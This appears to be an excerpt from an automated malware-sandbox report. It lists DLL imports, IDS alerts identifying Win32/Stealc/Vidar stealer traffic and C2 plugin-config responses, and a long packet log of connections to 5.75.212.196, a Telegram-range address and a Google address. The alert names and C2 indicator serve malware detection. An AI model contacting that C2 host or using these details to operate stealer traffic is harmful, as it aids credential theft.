                                                                                                                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                    2024-12-06T09:42:08.026227+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.4498025.75.212.196443TCP
                                                                                                                                                                                    2024-12-06T09:42:10.293155+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config15.75.212.196443192.168.2.449808TCP
                                                                                                                                                                                    2024-12-06T09:42:12.558181+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M115.75.212.196443192.168.2.449814TCP
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Dec 6, 2024 09:41:58.555704117 CET49784443192.168.2.4149.154.167.99
                                                                                                                                                                                    Dec 6, 2024 09:41:58.555744886 CET44349784149.154.167.99192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:41:58.555825949 CET49784443192.168.2.4149.154.167.99
                                                                                                                                                                                    Dec 6, 2024 09:41:58.562189102 CET49784443192.168.2.4149.154.167.99
                                                                                                                                                                                    Dec 6, 2024 09:41:58.562197924 CET44349784149.154.167.99192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:41:59.949896097 CET44349784149.154.167.99192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:41:59.950118065 CET49784443192.168.2.4149.154.167.99
                                                                                                                                                                                    Dec 6, 2024 09:42:00.022367954 CET49784443192.168.2.4149.154.167.99
                                                                                                                                                                                    Dec 6, 2024 09:42:00.022407055 CET44349784149.154.167.99192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:00.022670031 CET44349784149.154.167.99192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:00.022730112 CET49784443192.168.2.4149.154.167.99
                                                                                                                                                                                    Dec 6, 2024 09:42:00.051948071 CET49784443192.168.2.4149.154.167.99
                                                                                                                                                                                    Dec 6, 2024 09:42:00.099325895 CET44349784149.154.167.99192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:00.497541904 CET44349784149.154.167.99192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:00.497565985 CET44349784149.154.167.99192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:00.497610092 CET44349784149.154.167.99192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:00.497632027 CET44349784149.154.167.99192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:00.497713089 CET49784443192.168.2.4149.154.167.99
                                                                                                                                                                                    Dec 6, 2024 09:42:00.497771025 CET49784443192.168.2.4149.154.167.99
                                                                                                                                                                                    Dec 6, 2024 09:42:00.510413885 CET49784443192.168.2.4149.154.167.99
                                                                                                                                                                                    Dec 6, 2024 09:42:00.510436058 CET44349784149.154.167.99192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:00.834557056 CET49790443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:00.834610939 CET443497905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:00.834692955 CET49790443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:00.835042000 CET49790443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:00.835052967 CET443497905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:02.668945074 CET443497905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:02.669017076 CET49790443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:02.673346043 CET49790443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:02.673357010 CET443497905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:02.673674107 CET443497905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:02.673727036 CET49790443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:02.674192905 CET49790443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:02.719321966 CET443497905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:03.342689037 CET443497905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:03.342781067 CET443497905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:03.342796087 CET49790443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:03.342825890 CET49790443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:03.397243977 CET49790443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:03.397277117 CET443497905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:03.462867975 CET49796443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:03.462918997 CET443497965.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:03.462989092 CET49796443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:03.463310957 CET49796443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:03.463324070 CET443497965.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:04.863934040 CET443497965.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:04.864021063 CET49796443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:04.864571095 CET49796443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:04.864583969 CET443497965.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:04.866583109 CET49796443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:04.866592884 CET443497965.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:05.750262022 CET443497965.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:05.750354052 CET443497965.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:05.750550032 CET49796443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:05.750854969 CET49796443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:05.750874043 CET443497965.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:05.752549887 CET49802443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:05.752588034 CET443498025.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:05.752657890 CET49802443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:05.752882957 CET49802443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:05.752887964 CET443498025.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:07.150543928 CET443498025.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:07.150813103 CET49802443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:07.151685953 CET49802443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:07.151695967 CET443498025.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:07.154620886 CET49802443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:07.154625893 CET443498025.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:08.026273012 CET443498025.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:08.026303053 CET443498025.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:08.026341915 CET49802443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:08.026372910 CET443498025.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:08.026386023 CET49802443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:08.026398897 CET443498025.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:08.026407957 CET49802443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:08.026441097 CET49802443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:08.026855946 CET49802443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:08.026874065 CET443498025.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:08.028747082 CET49808443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:08.028786898 CET443498085.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:08.028853893 CET49808443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:08.029131889 CET49808443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:08.029143095 CET443498085.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:09.429564953 CET443498085.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:09.429667950 CET49808443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:09.430265903 CET49808443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:09.430274963 CET443498085.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:09.432192087 CET49808443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:09.432197094 CET443498085.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:10.292891026 CET443498085.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:10.292921066 CET443498085.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:10.292998075 CET443498085.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:10.293097973 CET49808443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:10.293140888 CET49808443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:10.293468952 CET49808443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:10.293489933 CET443498085.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:10.295717955 CET49814443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:10.295763016 CET443498145.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:10.295851946 CET49814443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:10.296096087 CET49814443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:10.296111107 CET443498145.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:11.692617893 CET443498145.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:11.692683935 CET49814443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:11.693171978 CET49814443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:11.693178892 CET443498145.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:11.695327044 CET49814443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:11.695331097 CET443498145.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:12.557981968 CET443498145.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:12.558079004 CET443498145.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:12.558192015 CET49814443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:12.558520079 CET49814443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:12.558535099 CET443498145.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:12.575139999 CET49820443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:12.575187922 CET443498205.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:12.575270891 CET49820443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:12.575499058 CET49820443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:12.575509071 CET443498205.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:13.583018064 CET49826443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:13.583055973 CET443498265.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:13.583129883 CET49826443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:13.583414078 CET49826443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:13.583425999 CET443498265.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:13.975200891 CET443498205.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:13.975267887 CET49820443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:13.975775957 CET49820443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:13.975781918 CET443498205.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:13.977763891 CET49820443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:13.977771044 CET443498205.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:13.977813005 CET49820443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:13.977823019 CET443498205.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:14.951914072 CET443498205.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:14.951977968 CET49820443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:14.951994896 CET443498205.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:14.952009916 CET443498205.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:14.952043056 CET49820443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:14.952089071 CET49820443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:14.953289032 CET49820443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:14.953303099 CET443498205.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:15.202627897 CET443498265.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:15.202677965 CET49826443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:15.203097105 CET49826443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:15.203103065 CET443498265.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:15.204818010 CET49826443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:15.204826117 CET443498265.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:16.217602968 CET443498265.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:16.217672110 CET443498265.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:16.217787027 CET49826443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:16.249671936 CET49826443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:16.249692917 CET443498265.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:17.120799065 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:17.120822906 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:17.120881081 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:17.122186899 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:17.122193098 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:17.314543009 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:17.314578056 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:17.314862967 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:17.315073013 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:17.315083027 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:17.384469986 CET49839443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:17.384493113 CET44349839172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:17.384591103 CET49839443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:17.384915113 CET49839443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:17.384927034 CET44349839172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:17.461157084 CET49844443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:17.461184978 CET44349844172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:17.461302996 CET49844443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:17.461601973 CET49844443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:17.461613894 CET44349844172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:18.819925070 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:18.820219040 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:18.820241928 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:18.821110964 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:18.821180105 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:18.822263002 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:18.822320938 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:18.822560072 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:18.822566032 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:18.876395941 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.003876925 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.005795956 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.005815029 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.006788015 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.006853104 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.007308006 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.007381916 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.007491112 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.007500887 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.048305035 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.075519085 CET44349839172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.078403950 CET49839443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.078425884 CET44349839172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.079288960 CET44349839172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.079366922 CET49839443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.079710007 CET49839443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.079761028 CET44349839172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.079864979 CET49839443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.121567011 CET49839443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.121601105 CET44349839172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.158791065 CET44349844172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.159085035 CET49844443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.159113884 CET44349844172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.160181046 CET44349844172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.160250902 CET49844443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.160581112 CET49844443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.160641909 CET44349844172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.168396950 CET49839443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.215332985 CET49844443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.215351105 CET44349844172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.262176037 CET49844443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.659245968 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.659306049 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.659346104 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.659363985 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.659389973 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.659435034 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.659440994 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.659495115 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.659548044 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.661307096 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.661319971 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.887094975 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.887147903 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.887197971 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.887218952 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.887223959 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.887257099 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.887952089 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.895236969 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.895329952 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.935902119 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.939979076 CET44349839172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.940083981 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.940144062 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.940154076 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.940576077 CET44349839172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.940634012 CET49839443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.941400051 CET49839443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.941418886 CET44349839172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.950376987 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.950403929 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.950431108 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:19.950440884 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.950484037 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.073878050 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.080440044 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.080498934 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.080540895 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.094147921 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.094197035 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.094211102 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.107652903 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.107705116 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.107712984 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.121264935 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.121315002 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.121325016 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.134793997 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.134840965 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.134850979 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.148432970 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.148490906 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.148500919 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.162096977 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.162152052 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.162161112 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.175659895 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.175736904 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.175745010 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.193655014 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.193694115 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.193711996 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.193739891 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.193782091 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.202882051 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.246799946 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.246823072 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.265434027 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.265485048 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.265496016 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.267581940 CET44349838172.217.21.36192.168.2.4
